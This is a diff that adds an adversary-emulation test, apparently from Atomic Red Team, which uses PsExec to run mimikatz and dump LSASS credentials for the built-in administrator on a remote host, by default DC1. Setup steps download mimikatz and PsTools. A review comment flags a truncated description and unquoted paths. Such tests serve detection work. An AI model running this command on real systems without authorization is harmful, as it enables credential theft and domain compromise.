diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 67809902..e4cf0833 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -53,6 +53,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power
 privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
@@ -454,6 +455,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index eb51beb2..98ae9b4c 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -101,6 +101,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power
 privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
@@ -260,6 +261,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 444354bd..f97fbfa7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -117,6 +117,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] @@ -839,6 +840,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e2c5f731..78395c09 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -223,6 +223,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - Atomic Test #1: Reg Key Run [windows] - Atomic Test #2: Reg Key RunOnce [windows] 
@@ -478,6 +479,7 @@ - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: Shellcode execution via VBA [windows] + - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 89005fa7..fd4ef41a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -5967,6 +5967,62 @@ privilege-escalation: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest 
"https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false T1055.008: technique: external_references: 
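Review bot: The description of the new test is truncated: its last line reads "The effect of `/inject` is explained in" with nothing following, so the intended reference should be added or the sentence dropped; this file looks like a generated index, so the fix belongs in the technique's source YAML (not part of this diff), and the same text recurs in the defense-evasion hunk below and in the T1055.md rendering. Two smaller inconsistencies sit in the same block: `psexec_path` is declared `type: string` while `mimikatz_path` is `type: path`, and the executor command interpolates both paths unquoted although the prereq check quotes `"#{psexec_path}"`, so a path containing spaces passes the prerequisite check and still breaks the command line. Declaring `type: path` for `psexec_path` and writing the command as `'"#{psexec_path}" /accepteula \\#{machine} -s -c "#{mimikatz_path}" "lsadump::lsa /inject /id:500" "exit"'` would make the three places agree. No `cleanup_command` is given; if PsExec `-c` leaves the copied executable on the remote host (not verifiable from this page), a cleanup step should be added so the test does not leave the tool behind on the target.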
@@ -36768,6 +36824,62 @@ defense-evasion: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest 
"https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false T1055.008: technique: external_references: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index dc781f76..f57dcfe4 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -12,6 +12,8 @@ More sophisticated samples may perform multiple process injections to segment mo - [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba) +- [Atomic Test #3 - Remote Process Injection in LSASS via mimikatz](#atomic-test-3---remote-process-injection-in-lsass-via-mimikatz) +
@@ -105,4 +107,67 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th +
+
+ +## Atomic Test #3 - Remote Process Injection in LSASS via mimikatz +Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). +It must be executed in the context of a user who is privileged on remote `machine`. + +The effect of `/inject` is explained in + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| machine | machine to target (via psexec) | string | DC1| +| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe| +| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) +##### Check Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force +New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null +Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force +``` +##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) +##### Check Prereq Commands: +```powershell +if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" +Expand-Archive 
$env:TEMP\PsTools.zip $env:TEMP\PsTools -Force +New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null +Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force +``` + + + +